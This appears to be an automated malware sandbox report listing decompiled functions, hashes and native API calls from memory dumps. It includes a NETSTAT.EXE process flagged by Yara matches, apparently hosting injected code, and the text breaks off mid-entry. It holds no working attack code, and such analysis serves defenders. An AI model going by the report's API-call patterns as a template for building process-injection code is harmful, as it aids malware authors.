                                                                      Function 011A7D50, Relevance: .0, Instructions: 7COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                      • Instruction ID: 7a2dd425845e1889d822929e9c954dfe25d51646fcc8477b2e5bad5731c96acc
                                                                      • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                      • Instruction Fuzzy Hash: 15B092393019408FCE1ADF28C080B1933E4BB44A40B8400D0E400CBA21D32AE9008900
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011B2ACB, Relevance: .0, Instructions: 5COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                      • Instruction ID: 7fbb1f57bde92f43791b41420b7b217b4c78835cbcf44e3ce079293ecf97ce0b
                                                                      • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                      • Instruction Fuzzy Hash: 0EB01232C51441CFCF06EF40C610B197331FB00750F094490901227D30C329AC01CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011CAD30, Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f6d4418d81e011db874f65404227f0a8af9aee1667922e6c1479a875513d3b1b
                                                                      • Instruction ID: aef77c1088950d9f5781b882ec316376ee7529810205bf6da73da3be744ad2dd
                                                                      • Opcode Fuzzy Hash: f6d4418d81e011db874f65404227f0a8af9aee1667922e6c1479a875513d3b1b
                                                                      • Instruction Fuzzy Hash: C2900271A45000129544719959146464006B7E0781F55C015A0505558CCA948A5563E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9520, Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c1e5e761f21a1fc351163733459ba7d982f7f98cfa219dcbda50297c02ce6e20
                                                                      • Instruction ID: 94fc1c3b887cd66339ec8c85926765753c565b30b16c47bfe2a9797c8e51bc61
                                                                      • Opcode Fuzzy Hash: c1e5e761f21a1fc351163733459ba7d982f7f98cfa219dcbda50297c02ce6e20
                                                                      • Instruction Fuzzy Hash: EA9002E1241140924904A2999504B0A4505A7E0241F51C01AE1045564CC6658851A175
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9950, Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dbe43442b7e5f28d9ea66dc04701bd770e168e4e32175649a4867938deb27f05
                                                                      • Instruction ID: 4a45afc69a8bd9269234be432ac9f7da8aba5780af83e58904cb85672a3f6875
                                                                      • Opcode Fuzzy Hash: dbe43442b7e5f28d9ea66dc04701bd770e168e4e32175649a4867938deb27f05
                                                                      • Instruction Fuzzy Hash: 569002A124140403D544659959046070005A7D0342F51C015A2055559ECB698C517175
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9560, Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ba9f098eff0d16beb7a8302327945affe09b84b0263614395e6045f6095e3cde
                                                                      • Instruction ID: 6c6aba8add3bc13718242ce111752da9aefb667b82a5955af6de2a75176711c7
                                                                      • Opcode Fuzzy Hash: ba9f098eff0d16beb7a8302327945affe09b84b0263614395e6045f6095e3cde
                                                                      • Instruction Fuzzy Hash: 58900265261000020549A599170450B0445B7D6391791C019F1407594CC76188656361
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C99D0, Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 71e8199bc09855b8101259aa738e3ff252880047e78c5162bcbf8bee0ab1fa77
                                                                      • Instruction ID: 85c89f031a39735e5a5df103983c86f538fd18a1f4844245ce6cb6c8d5998196
                                                                      • Opcode Fuzzy Hash: 71e8199bc09855b8101259aa738e3ff252880047e78c5162bcbf8bee0ab1fa77
                                                                      • Instruction Fuzzy Hash: D19002A125100042D508619955047060045A7E1241F51C016A2145558CC6698C616165
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C95F0, Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4feed03d53f17ce80d5a16676c1d01b023ca87d70405852c952bb760a4f1ec8a
                                                                      • Instruction ID: 6477f5f5ba53facd273cc162a9ff531ad0051d4a9f8c5fd533001af2076fe26c
                                                                      • Opcode Fuzzy Hash: 4feed03d53f17ce80d5a16676c1d01b023ca87d70405852c952bb760a4f1ec8a
                                                                      • Instruction Fuzzy Hash: B390027124100802D508619959046860005A7D0341F51C015A6015659ED7A588917171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9820, Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a7f46d7302cabe12c496e62e4a75e6fc6b712bb6ca848be3e40b21f337bc3b6
                                                                      • Instruction ID: f6818e4314cfec70c0b3be81c446aa19f707836979d00ed79c70e6b3cf547176
                                                                      • Opcode Fuzzy Hash: 2a7f46d7302cabe12c496e62e4a75e6fc6b712bb6ca848be3e40b21f337bc3b6
                                                                      • Instruction Fuzzy Hash: A590027128100402D545719955046060009B7D0281F91C016A0415558EC7958A56BAA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011CB040, Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8b3838b47274f939366e52d890024e86d5238392d80bdd59f05eabb6b7ed6819
                                                                      • Instruction ID: 48f72291bd47a6236f837abca1c6911be6e561f5d5ee0563ef047bbe89e12174
                                                                      • Opcode Fuzzy Hash: 8b3838b47274f939366e52d890024e86d5238392d80bdd59f05eabb6b7ed6819
                                                                      • Instruction Fuzzy Hash: EE9002A1641140434944B19959044065015B7E1341791C125A0445564CC7A88855A2A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C98A0, Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 56cef16fdbff9e42f3052f800f1a3bc39273b7bf3d2d43edb75fe79a58e19244
                                                                      • Instruction ID: e27e2357a021aa2a80f6ee0ae1436ecc844a52a35cabad9aa1bfe7d2d49487a0
                                                                      • Opcode Fuzzy Hash: 56cef16fdbff9e42f3052f800f1a3bc39273b7bf3d2d43edb75fe79a58e19244
                                                                      • Instruction Fuzzy Hash: 1390026134100402D506619955146060009E7D1385F91C016E1415559DC7658953B172
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011CA710, Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 94e7e7871b156ff46a203bff801081834d769c396dac28d12109688bf7c80c68
                                                                      • Instruction ID: 3a661b3a0145260d5b5d1d2b0d718a0e58dda21d43310d5ad3cbcf551063f59d
                                                                      • Opcode Fuzzy Hash: 94e7e7871b156ff46a203bff801081834d769c396dac28d12109688bf7c80c68
                                                                      • Instruction Fuzzy Hash: FD900271341000529904A6D96904A4A4105A7F0341F51D019A4005558CC69488616161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9B00, Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 246c99ac0542c8a09bc136200189124657144ecef56f6efb79bc912435ab559f
                                                                      • Instruction ID: 92b04221e0a5ef825a983e7ae866656348ad970977538b6300c84dcd6c87de64
                                                                      • Opcode Fuzzy Hash: 246c99ac0542c8a09bc136200189124657144ecef56f6efb79bc912435ab559f
                                                                      • Instruction Fuzzy Hash: D490026128100802D544719995147070006E7D0641F51C015A0015558DC756896576F1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9730, Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 390670f030436800f7239e0744d8a20b981fd898e5149b1fa297d31750211b88
                                                                      • Instruction ID: 040399c1ed7f34b89299abe46ba7811f7727afdd5a455fb02f3cc38a3792b659
                                                                      • Opcode Fuzzy Hash: 390670f030436800f7239e0744d8a20b981fd898e5149b1fa297d31750211b88
                                                                      • Instruction Fuzzy Hash: 1B90026164500402D544719965187060015A7D0241F51D015A0015558DC7998A5576E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9770, Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5d4e3eb97485acf28f38fe391e377d42013a418a02277d9959c4bea2cb9d7cc0
                                                                      • Instruction ID: cb70ee12420490c36a09032f0ca95e8d4ed0977812a75c586cb74653c3a9c695
                                                                      • Opcode Fuzzy Hash: 5d4e3eb97485acf28f38fe391e377d42013a418a02277d9959c4bea2cb9d7cc0
                                                                      • Instruction Fuzzy Hash: 6790026124504442D50465996508A060005A7D0245F51D015A1055599DC7758851B171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011CA770, Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f83450572ed9f52dfa1281d0b3a141cceb2e2a751e7240d66c44e179b72c86c9
                                                                      • Instruction ID: d66866f924986a3a418ac1b71130007ab7e64b0a3f4c853294129f8493aec164
                                                                      • Opcode Fuzzy Hash: f83450572ed9f52dfa1281d0b3a141cceb2e2a751e7240d66c44e179b72c86c9
                                                                      • Instruction Fuzzy Hash: 7190027524504442D90465996904A870005A7D0345F51D415A041559CDC7948861B161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9760, Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 39b5bdd5144a1506e1c24e92e039641c761e29d7792f979d7b05af5cf76ddb03
                                                                      • Instruction ID: 5eccd1eba3adcd7963201d98195956a787dfc1e6262d8692a727347fde77680b
                                                                      • Opcode Fuzzy Hash: 39b5bdd5144a1506e1c24e92e039641c761e29d7792f979d7b05af5cf76ddb03
                                                                      • Instruction Fuzzy Hash: D090047134100403D50471DD770C7070005F7D0341F51D415F041555CDD7D7CC517171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011CA3B0, Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f9acc37b0eb0cd23912c0527759243c783365914fcb0106fde3336451a60c04d
                                                                      • Instruction ID: f8348871e0a48cfe24953b4b83c3823087827e921cdd25ef3bf060f2006608aa
                                                                      • Opcode Fuzzy Hash: f9acc37b0eb0cd23912c0527759243c783365914fcb0106fde3336451a60c04d
                                                                      • Instruction Fuzzy Hash: 7C90027124144002D5447199954460B5005B7E0341F51C415E0416558CC7558856A261
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9610, Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ed96676501e61523cc659fb9af5912821cfad1e9cdd9c3ff3455ac7aee91dae5
                                                                      • Instruction ID: b26de870d799aafacbf892f052afa66d27eee1fcf1b21286a5de871ea2dfdee1
                                                                      • Opcode Fuzzy Hash: ed96676501e61523cc659fb9af5912821cfad1e9cdd9c3ff3455ac7aee91dae5
                                                                      • Instruction Fuzzy Hash: 4F90027164500802D554719955147460005A7D0341F51C015A0015658DC7958A5576E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9A10, Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9e71fb596d65131299260696d346a0744cd69dff02ce0a1a68379994aca53ac0
                                                                      • Instruction ID: b463b435c5bd2f877f4d591aea3984d956c0474211c13464861f7a0752c1281e
                                                                      • Opcode Fuzzy Hash: 9e71fb596d65131299260696d346a0744cd69dff02ce0a1a68379994aca53ac0
                                                                      • Instruction Fuzzy Hash: D290027124140402D504619959087470005A7D0342F51C015A5155559EC7A5C8917571
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9650, Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ce6397b50b30560440d733af7066bac7bfb90800e16aed80292fadb303fbb09c
                                                                      • Instruction ID: 31730fbeef25bc0e724a6bb05089a6c70332eb4da294c5579d699b330aec7911
                                                                      • Opcode Fuzzy Hash: ce6397b50b30560440d733af7066bac7bfb90800e16aed80292fadb303fbb09c
                                                                      • Instruction Fuzzy Hash: B190027124504842D54471995504A460015A7D0345F51C015A0055698DD7658D55B6A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9A80, Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5bc2a36541a161280d524010800efce612fab3360a853c493b63bb0a9e565391
                                                                      • Instruction ID: 85ed10b15ff8a91b3fe92fa3ffdf8d74eb72979528d68420e87cfa1ca7015bbf
                                                                      • Opcode Fuzzy Hash: 5bc2a36541a161280d524010800efce612fab3360a853c493b63bb0a9e565391
                                                                      • Instruction Fuzzy Hash: D590026124144442D54462995904B0F4105A7E1242F91C01DA4147558CCA5588556761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C96D0, Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3e26fc1c57eb760df9e2c9327c963196fe4623da6a3e95da66ccd8c65bb79452
                                                                      • Instruction ID: 8d9af92ae2c60c1a349468b36b2545c04966583788d9bc11596a77a3c961ff6e
                                                                      • Opcode Fuzzy Hash: 3e26fc1c57eb760df9e2c9327c963196fe4623da6a3e95da66ccd8c65bb79452
                                                                      • Instruction Fuzzy Hash: 9F90027124100842D50461995504B460005A7E0341F51C01AA0115658DC755C8517561
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9670, Relevance: .0, Instructions: 2COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction ID: 6a3706ca00d5f63102f6378c96c31dcf22ea98fb9a6b2c81f3e956e66eed58ac
                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0121FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 53%
                                                                      			E0121FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E011CCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01215720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01215720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                      0x0121fdda
                                                                      0x0121fde2
                                                                      0x0121fde5
                                                                      0x0121fdec
                                                                      0x0121fdfa
                                                                      0x0121fdff
                                                                      0x0121fe0a
                                                                      0x0121fe0f
                                                                      0x0121fe17
                                                                      0x0121fe1e
                                                                      0x0121fe19
                                                                      0x0121fe19
                                                                      0x0121fe19
                                                                      0x0121fe20
                                                                      0x0121fe21
                                                                      0x0121fe22
                                                                      0x0121fe25
                                                                      0x0121fe40

                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0121FDFA
                                                                      Strings
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0121FE2B
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0121FE01
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                      • API String ID: 885266447-3903918235
                                                                      • Opcode ID: 14cf4a6613b31e2847edbe9a2c2dbeaa0f37a210726f1719694959e105cbad4a
                                                                      • Instruction ID: 4b4af4a0c51a7347fe6213789be628d10f964be156f49b4641c0ddac32b7732a
                                                                      • Opcode Fuzzy Hash: 14cf4a6613b31e2847edbe9a2c2dbeaa0f37a210726f1719694959e105cbad4a
                                                                      • Instruction Fuzzy Hash: C1F0F632210202BFE7295A45DC02F33BFABEBA5B30F140318F628561D1DA62F86196F0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: NETSTAT.EXE PID: 3204 Parent PID: 3472 NETSTAT.EXECOMMON

                                                                      Executed Functions

                                                                      Function 003D86DA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32nativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtClose.NTDLL(@==,?,?,003D3D40,00000000,FFFFFFFF), ref: 003D8705
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID: @==$m;=
                                                                      • API String ID: 3535843008-867631472
                                                                      • Opcode ID: 6cf120370936278f00b116b0e8d1e9d7e862436aff26ade48e795f4217cb668d
                                                                      • Instruction ID: 9d36244a89285c4474d97fde13731b1630481432209574ad9c8e7790d566bbc4
                                                                      • Opcode Fuzzy Hash: 6cf120370936278f00b116b0e8d1e9d7e862436aff26ade48e795f4217cb668d
                                                                      • Instruction Fuzzy Hash: 74E092722401146BDB10EBE8AC85EEB7B68DF84764F11456AFA1CAB242C931E2118AE0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003D85AA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,003D3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,003D3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 003D85FD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: .z`
                                                                      • API String ID: 823142352-1441809116
                                                                      • Opcode ID: dac9615a8c8aa45dcc6329a0831157119820a3bd4bf830656e873f0e7c655f8d
                                                                      • Instruction ID: 2dd8f3093b95729fd73ba0fe1948981041fb85bc6a12b78873026f344fd0a502
                                                                      • Opcode Fuzzy Hash: dac9615a8c8aa45dcc6329a0831157119820a3bd4bf830656e873f0e7c655f8d
                                                                      • Instruction Fuzzy Hash: 0501BDB6241209AFDB48DF88DC85EEB77A9AF8C354F158259FA1D97240D630E851CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003D85B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,003D3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,003D3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 003D85FD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: .z`
                                                                      • API String ID: 823142352-1441809116
                                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                      • Instruction ID: ccbe7e435ddceb0b337b95d3ebfed836ed9083013059ff7dd4b3420e35775de8
                                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                      • Instruction Fuzzy Hash: 5BF0B2B2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003D8660, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:=,FFFFFFFF,?,b==,?,00000000), ref: 003D86A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID: !:=
                                                                      • API String ID: 2738559852-3138348973
                                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                      • Instruction ID: e86055898715c571a695b118aa9f4a4efae22036a702e3c4a7bf302ad2df178e
                                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                      • Instruction Fuzzy Hash: A0F0A4B2200209ABCB14DF89DC85EEB77ADAF8C754F158249BA1D97241DA30E811CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003D86E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtClose.NTDLL(@==,?,?,003D3D40,00000000,FFFFFFFF), ref: 003D8705
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID: @==
                                                                      • API String ID: 3535843008-3176878205
                                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                      • Instruction ID: 8e0ac57d5aff647e628782264995ff6ef1f6c012bd9a6becbf700cda34d8077f
                                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                      • Instruction Fuzzy Hash: BDD01776200214ABD711EB98DC89FA77BADEF48760F15449ABA189B342C930FA0086E0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003D878A, Relevance: 1.5, APIs: 1, Instructions: 34memorynativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,003C2D11,00002000,00003000,00000004), ref: 003D87C9
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
